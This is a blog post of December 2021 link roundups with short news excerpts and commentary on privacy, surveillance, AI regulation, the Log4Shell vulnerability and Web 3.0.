Saturday, December 18, 2021

Your employee’s favorite tool might not be acceptable.

https://www.upi.com/Top_News/US/2021/12/17/jpmorgan-chase-sec-fine-whatsapp/9161639750005/?u3L=1

SEC gives JPMorgan Chase record fine for using WhatsApp to conduct business

JPMorgan Chase has agreed to pay a $125 million penalty for allowing employees on Wall Street to use smartphone apps to get around federal record-keeping laws, regulators announced Friday.

The Securities and Exchange Commission said the violations occurred between 2018 and 2020, during which some JPMorgan employees used WhatsApp and personal email accounts to conduct official business.



Apparently everything I was taught was backwards!

https://hbr.org/2021/12/digital-transformation-changes-how-companies-create-value

Digital Transformation Changes How Companies Create Value

Digital transformation is about changing where value is created, and how your business model is structured. More and more, value creation comes from outside the firm not inside, and from external partners rather than internal employees. The authors call this new production model an “inverted firm,” a change in organizational structure that affects not only the technology but also the managerial governance that attends it. Executives must understand and undertake partner relationship management, partner data management, partner product management, platform governance, and platform strategy. They must learn how to motivate people they don’t know to share ideas they don’t have.

The most obvious examples of this trend are the platform firms Google, Apple, Facebook, Amazon, and Microsoft. They have managed to achieve scale economies in revenues per employee that would put the hyperscalers of the 19th and early 20th centuries to shame. Facebook and Google do not author the posts or web pages they deliver. Apple, Microsoft, and Google do not write the vast majority of apps in their ecosystems. Alibaba and Amazon never purchase or make an even vaster number of the items they sell. Smaller firms, modeled on platforms, show this same pattern. Sampling from the Forbes Global 2000, platform firms compared to industry controls had much higher market values ($21,726 M vs. $8,243 M), much higher margins (21% vs. 12%), but only half the employees (9,872 vs. 19,000).



Perspective. No need for laws as long as my killer robot is better than your killer robot.

https://www.aljazeera.com/news/2021/12/18/un-talks-fail-to-open-negotiations-on-killer-robots

UN talks fail to open negotiations on ‘killer robots’

Sixty-eight states have called for a legal instrument at the UN while a number of NGOs have been battling the unregulated spread of such weapons and pushing for new regulations.

Austrian Foreign Minister Alexander Schallenberg and New Zealand’s Minister for Disarmament and Arms Control Phil Twyford have both called for the development of new international laws regulating autonomous weapons. The new government coalition agreements of Norway and Germany have promised to take action on this issue.


(Related)

https://www.theregister.com/2021/12/17/raf_shoots_down_drone_syria/

RAF shoots down 'terrorist drone' over US-owned special ops base in Syria

The RAF has scored its first air-to-air "kill" – where an aircraft downs an enemy aircraft – for almost 40 years after shooting down a drone over Syria.

The drone's type was not disclosed by the Ministry of Defence, which issued a press statement yesterday boasting of the Royal Air Force Typhoon FGR.4's victory.

"The engagement took place on 14 December when the drone activity was detected above the Al Tanf Coalition base in Syria," said the MoD. "RAF Typhoons conducting routine patrols in the area were tasked to investigate."

The Eurofighter Typhoon pilot used an ASRAAM missile to destroy the "small hostile drone." The MBDA-made heat-seeking missile is estimated to cost around £200,000 per unit.


Friday, December 17, 2021

Something to quote from…

https://www.pogowasright.org/notable-privacy-and-security-books-2021/

Notable Privacy and Security Books 2021

Looking for good books to gift or read over the holidays? Privacy scholar Dan Solove has compiled a helpful list of notable books on privacy and security from 2021.

Want even more recommendations from all years? Professors Paul Schwartz and Solove maintain a resource page on Nonfiction Privacy + Security Books.



Is any update useful without a federal privacy law?

https://www.pogowasright.org/federal-study-acknowledges-failures-in-police-surveillance-oversight/

Federal Study Acknowledges Failures in Police Surveillance Oversight

For years researchers have called out the Wiretap Report for being outdated and incomplete

There are major flaws in how the federal government monitors police surveillance of Americans, a new government report found, representing the first time the federal court system has acknowledged its own failure to track things like wiretaps and electronic surveillance.

A study, conducted by the Federal Judicial Center, the research branch of the judicial branch of the U.S. government, says the federal court system’s annual Wiretap Report—which compiles information on local and federal law enforcement interceptions of people’s communications—is riddled with inaccuracies. Reporting requirements, the study found, fail to incorporate new technologies, further leaving the public and lawmakers in the dark as to how police use devices like stingrays and how often they collect things like text messages and cellphone data.

Privacy and civil liberties advocates have long criticized the system for overseeing law enforcement surveillance, but never before has the judicial agency publicly acknowledged its own failings.

Every year, federal and state judges are required by law to report all the wiretap orders they approved to the Administrative Office of the U.S. Courts, and prosecutors are also required to report wiretap orders they requested. The office uses that data to send Congress the annual Wiretap Report, which helps inform decisions about law enforcement, surveillance, and data privacy issues.

For at least the last 15 years, legal experts, judges, and lawmakers have criticized the Wiretap Report for under-reporting the amount of wiretap orders that are actually issued and for failing to keep up with modern technology and surveillance techniques.

Albert Gidari, a retired lawyer who served as the consulting director of privacy at the Stanford Center for Internet and Society, has long called out the Wiretap Report’s inaccuracies. He started in 2005 speaking out about the inefficacy of wiretaps at conferences, and then, in 2010, once companies started releasing transparency reports, he pointed out their inaccuracies. In 2017, Gidari published a blog post highlighting how the Wiretap Report under-reported law enforcement surveillance. He found that while the Wiretap Report identified 3,554 phone wiretaps in 2014, phone carriers that same year reported receiving 10,712 wiretap orders.

Gidari said that nothing has changed with the Wiretap Report since.

It’s not the sexiest issue that faces the country, but it’s still a really important one, especially in a world where everything is collected,” Gidari said. “Our very privacy foundations are really at risk.”

He said the Judicial Center acknowledging these flaws was essential to taking steps to fixing the problem.

Between 2019 and 2021, the center conducted a series of focus groups and surveys split into two groups, one judiciary stakeholders like prosecutors, and judges, and the other non-judiciary stakeholders like academics, lawyers, civil rights groups, and congressional staff.

The study came after a 2017 letter from Sen. Ron Wyden, a Democrat from Oregon, directed the Judicial Conference, the policy-making body for the federal courts, to implement transparency reforms for electronic surveillance, including an update to the Wiretap Report’s methodology.

Wyden said he plans to introduce legislation that will require similar reports on other surveillance methods.

The wiretap report is a relic from the last century that reports on surveillance of pagers and fax machines, instead of use of modern surveillance technology, like malware and stingrays,” Wyden said in an email to The Markup. “The courts deserve a lot of credit for taking on the process of updating the wiretap reports, but it is clear that Congress will also need to pass a new law requiring annual reports for other forms of surveillance, such as location tracking and demands for data stored in the cloud.”

While each focus group in the study had different concerns with the Wiretap Report, some common key issues surfaced. Both groups called for updates to the report to reflect surveillance on modern technology and for better enforcement against inaccuracies.

Outdated Technologies

The Wiretap Report became a legally required disclosure in 1968 with the Omnibus Crime Control and Safe Streets Act. At the time, the only device that wiretaps were really intended for were landline phones.

But now wiretaps are mostly conducted on cellphones, and often phone data is included. Prosecutors and judges in the study said they couldn’t accurately disclose their surveillance requests because the “technologies listed on the forms were not up to date,” according to the study.

While the Wiretap Report covers surveillance on phone calls, there’s no transparency on surveillance on phone data, device location, messaging through texts or messenger apps, or online voice calls.

It also doesn’t cover new methods of surveillance like geofence warrant requests or stingray devices that intercept phone data.

That type of surveillance is not being entered in a wiretap report, and it probably couldn’t be under current legal authorities,” Stephen Wm. Smith, a retired federal magistrate judge and a former director of Fourth Amendment and Open Courts at Stanford’s Center for Internet and Society, said. “We need to update our other surveillance laws to require reporting on the same level as wiretap reporting.”

Both Gidari and Smith participated in the study as non-judiciary stakeholders.

Prosecutors and judges said because the technologies covered were outdated, there was confusion over what they needed to report to the Wiretap Report. They recommended adding new technologies like communications apps and VoIP apps to the report.

All participants agreed that the statute (18 U.S.C. § 2519) is out of date with respect to modern communications technology, and that an update would resolve at least some of the confusion about what is to be reported and how,” the study said.

Inaccurate Reports

All participants in the study also said that the Wiretap Report was consistently inaccurate, even when it comes to more traditional wiretaps, raising further concerns that policymakers would make decisions based on flawed information.

Prosecutors and judges blamed a lack of standards for the inaccurate reports, noting that there is no central template to follow for these disclosures. For example, participants weren’t sure if there needed to be a new wiretap issued for each phone number or device added to an investigation or if only an extension for an existing wiretap order was necessary, according to the study.

State prosecutors also said that they lacked training on how to file reports. And the Administrative Office of the U.S. Courts has no way of requesting information or penalizing those who don’t adequately report it.

There is no feedback from the Administrative Office concerning errors or omissions on the submitted forms. Without feedback, there is no accountability, and the errors and omissions are likely to persist,” the study said.

Watchdogs who have scrutinized the Wiretap Report over the years have repeatedly raised concerns that some jurisdictions simply do not disclose their wiretaps, even when legally required to do so.

Smith, for example, found that many major cities had fewer wiretaps reported than small communities. He also found some of them just didn’t report at all.

They weren’t doing any wiretaps in Dallas? I mean, come on,” he said. He recommended that the Administrative Office call out the cities and states that were failing to report each year.

The study also noted that many participants weren’t aware that the Administrative Office doesn’t have enforcement capabilities.

Learning about the states that absolutely refused to report, that was new to us,” Gidari said. “It never occurred to me that the AO didn’t have the ability to pick up the phone and call a recalcitrant prosecutor and the chief judge of the district and say, ‘You’re not reporting. This is a law.’”

Because of this lack of enforcement capabilities, participants in the study recommend that Congress take action, calling for legislative changes that would give the Administrative Office enforcement powers or the ability to impose penalties for failure to report.

The more Congress becomes aware of this, the more likely it is that something will happen,” Smith said.

This article was originally published on The Markup and was republished under the Creative Commons Attribution-NonCommercial-NoDerivatives license.



I doubt they will switch to an ‘opt in’ strategy, so what will they do? Perhaps they will search databases owned by governments?

https://www.theverge.com/2021/12/16/22840179/france-cnil-clearview-ai-facial-recognition-privacy-gdpr

French regulator tells Clearview AI to delete its facial recognition data

France’s foremost privacy regulator has ordered Clearview AI to delete all its data relating to French citizens, as first reported by TechCrunch.

In its announcement, the French agency CNIL argued that Clearview had violated the GDPR in collecting the data and violated various other data access rights in its processing and storage. As a result, CNIL is calling on Clearview to purge the data from its systems or face escalating fines as laid out by European privacy law.



Figuring out AI.

https://www.quantamagazine.org/what-does-it-mean-for-ai-to-understand-20211216/

What Does It Mean for AI to Understand?

Remember IBM’s Watson, the AI Jeopardy! champion? A 2010 promotion proclaimed, “Watson understands natural language with all its ambiguity and complexity.” However, as we saw when Watson subsequently failed spectacularly in its quest to “revolutionize medicine with artificial intelligence,” a veneer of linguistic facility is not the same as actually comprehending human language.

Natural language understanding has long been a major goal of AI research. At first, researchers tried to manually program everything a machine would need to make sense of news stories, fiction or anything else humans might write. This approach, as Watson showed, was futile — it’s impossible to write down all the unwritten facts, rules and assumptions required for understanding text. More recently, a new paradigm has been established: Instead of building in explicit knowledge, we let machines learn to understand language on their own, simply by ingesting vast amounts of written text and learning to predict words. The result is what researchers call a language model. When based on large neural networks, like OpenAI’s GPT-3, such models can generate uncannily humanlike prose (and poetry!) and seemingly perform sophisticated linguistic reasoning.


Monday, December 13, 2021

Today we use the pandemic to justify it. The technology can also track political dissidents.

https://www.reuters.com/world/asia-pacific/skorea-test-ai-powered-facial-recognition-track-covid-19-cases-2021-12-13/

S.Korea to test AI-powered facial recognition to track COVID-19 cases

South Korea will soon roll out a pilot project to use artificial intelligence, facial recognition and thousands of CCTV cameras to track the movement of people infected with the coronavirus, despite concerns about the invasion of privacy.

The nationally funded project in Bucheon, one of the country's most densely populated cities on the outskirts of Seoul, is due to become operational in January, a city official told Reuters.

The system uses an AI algorithms and facial recognition technology to analyse footage gathered by more than 10,820 CCTV cameras and track an infected person’s movements, anyone they had close contact with, and whether they were wearing a mask, according to a 110-page business plan from the city submitted to the Ministry of Science and ICT (Information and Communications Technology), and provided to Reuters by a parliamentary lawmaker critical of the project.



The value of people who make bad choices?

https://insight.kellogg.northwestern.edu/article/podcast-why-you-need-a-working-knowledge-of-ai

Podcast: Why You Need a Working Knowledge of AI

What do Watermelon Oreos and Cheetos lip balm have in common? A customer you don’t want.

Using artificial intelligence, marketing professor Eric Anderson and a team of researchers learned that fans of these ultimately doomed products were “harbingers of failure,” in that they tended to really like items that were later discontinued. The fine print for businesses: you don’t want your product to be in their shopping carts.

Note: The Insightful Leader is produced for the ear and not meant to be read as a transcript. We encourage you to listen to the audio version above. However, a transcript of this episode is available here. https://insight.kellogg.northwestern.edu/content/uploads/Eric-Anderson-AI-podcast-transcription.pdf



What happens if the UK says no?

https://www.reuters.com/world/uk/uk-antitrust-regulator-looks-into-microsofts-16-bln-nuance-deal-2021-12-13/

UK antitrust regulator looks into Microsoft's $16 bln Nuance deal

The Competition and Markets Authority (CMA), which has been stepping up its regulation of Big Tech, said it was considering if the deal would result in lesser competition in the UK market.

Microsoft announced it would buy Nuance in April to boost its presence in cloud services for healthcare. The deal has already received regulatory approval in the United States and Australia, without remedies given.



Some minor changes to economic thought in the age of AI.

https://www.ft.com/content/d1bfa6d4-cee9-49db-9f79-eaf5ebfebf76

Health tech industry learns true value of medical data

In a medical artificial intelligence business, the quality of your algorithms — and therefore the value of your company — depends on your access to data. In this, the health tech sector is in some ways similar to advertising and internet search industries: it has quickly learnt that data is immensely valuable.

… Some 20 US healthcare systems recently formed a data company called Truveta, raising $200m to capitalise on the value of their combined patient records. In 2018, pharmaceutical company Roche valued US cancer patient data at almost $2bn, through its acquisition of Flatiron Health.

Hospitals and diagnostic labs are a rich source of this kind of health data for AI developers. Their databases of images and medical records are fodder for machine learning algorithms. These healthcare facilities typically seek patient consent for use of their data via a blanket “research use” provision that is a condition for using the medical service.


(Related)

https://www.inc.com/kevin-j-ryan/artificial-intelligence-social-justice-responsibility-microsoft-mary-gray-neurips.html

A Microsoft Researcher on the Power (and Perils) of Building AI

Harvard anthropologist Mary Gray explains why some of the biggest problems can arise in the earliest stages.

Relying on artificial intelligence in your business comes with some serious responsibilities. Just ask Mary Gray, a Harvard anthropologist and senior principal researcher at Microsoft Research who this week stressed the importance of collecting data mindfully when building AI--and how failing to do so can result in social injustices. Gray was speaking at the Conference on Neural Information Processing Systems about the relationship between AI and social justice.

"Data," she cautioned to the online audience, "is power."


Sunday, December 12, 2021

Basil Blume pointed this one out. (How could I have missed it?)

https://www.denverpost.com/2021/12/10/log4shell-cybersecurity-critical-software-flaw/?utm_source=feedburner&utm_medium=email

The internet’s on fire” as techs race to fix critical software flaw

Cybersecurity firm CEO called Log4Shell bug “the single biggest, most critical vulnerability of the last decade”

The flaw may be the worst computer vulnerability discovered in years. It was uncovered in an open-source logging tool that is ubiquitous in cloud servers and enterprise software used across industry and government. Unless it is fixed, it grants criminals, spies and programming novices alike easy access to internal networks where they can loot valuable data, plant malware, erase crucial information and much more.

I’d be hard-pressed to think of a company that’s not at risk,” said Joe Sullivan, chief security officer for Cloudflare, whose online infrastructure protects websites from malicious actors. Untold millions of servers have it installed, and experts said the fallout would not be known for several days.



An article to start my lawyer friends drooling…

https://papers.ssrn.com/sol3/papers.cfm?abstract_id=3976653

Ways That “Bad AI” Will Produce A Lawyering Goldmine Of Sorts

Though many have generally been assuming that AI would be used for the benefit of mankind, the reality is that there are lots of bad (improper, illegal, etc.) uses that are appearing with increasing frequency. Sometimes the bad AI is by accidental release, while in other cases it is AI purposely devised for bad purposes. All in all, some are predicting a veritable goldmine of legal cases for attorneys specializing in the “Bad AI” realm that will be seeking to defend their clients accused of such AI miscreant efforts.



Crying fowl?

https://scholarlycommons.law.northwestern.edu/njtip/vol19/iss1/4/

Ostrich with Its Head in the Sand: The Law, Inventorship, & Artificial Intelligence

As artificial intelligence (AI) system’s capabilities advance, the law has struggled to keep pace. Nowhere is this more evident than patent law’s refusal to recognize AI as an inventor. This is precisely what happened when, in 2020, the U.S. Patent and Trademark Office (USPTO) ruled that it will not accept an AI system as a named inventor on a patent.

This note explores untenable legal fiction that the USPTO’s ruling has created. First, it explores the current state of AI systems, focusing on those capable of invention. Next, it examines patent law’s inventorship doctrine and the USPTO’s application of that doctrine to AI inventors. The note then explains that disallowing AI systems as inventors does not map well onto patent law’s most common justifications. Finally, the note recommends a solution that maximizes patent law’s incentive structure; AI systems should be allowed as named inventors when patent ownership has been pre-contracted away to a natural person. If patent ownership has not been pre-contracted, the idea should enter the public domain and be unpatentable.



Perspective.

https://screenrant.com/web30-internet-explained-metaverse-blockchain/

What Is Web 3.0 And Could It Really Change The Internet Forever?

As the name implies, there have been two versions of internet computing, progressively adding more and more internet services that open up new digital doorways. Web 1.0 was the initial phase of the world wide web that showcased information, but it was limited in ability, clunky to maneuver, and didn't offer many ways to monetize content. Web 2.0 enhanced its predecessor by sorting information on websites (thank you, Google!), allowing information freely to flow from site-owner to user, and introducing tools for users to generate content. Many people are now calling for a new generation of the web that will tackle internet flaws that the latest generation is pointing out.

Web 3.0 is being promoted heavily because content creators are outraged that only a few large corporations own most of the websites, and they want a way to take the power back. Newsfeeds are riddled with narratives that large social media entities like Twitter reap all the rewards from content generation. Technocrats are calling for a new edition of the web built on the blockchain, which would hopefully make content-creators owners of their content and allow them to monetize it accordingly. Rather than a company receiving royalties off of content, web 3.0 would allot each content creator a token on the blockchain every time a user accessed their content which would accrue tangible monetary value.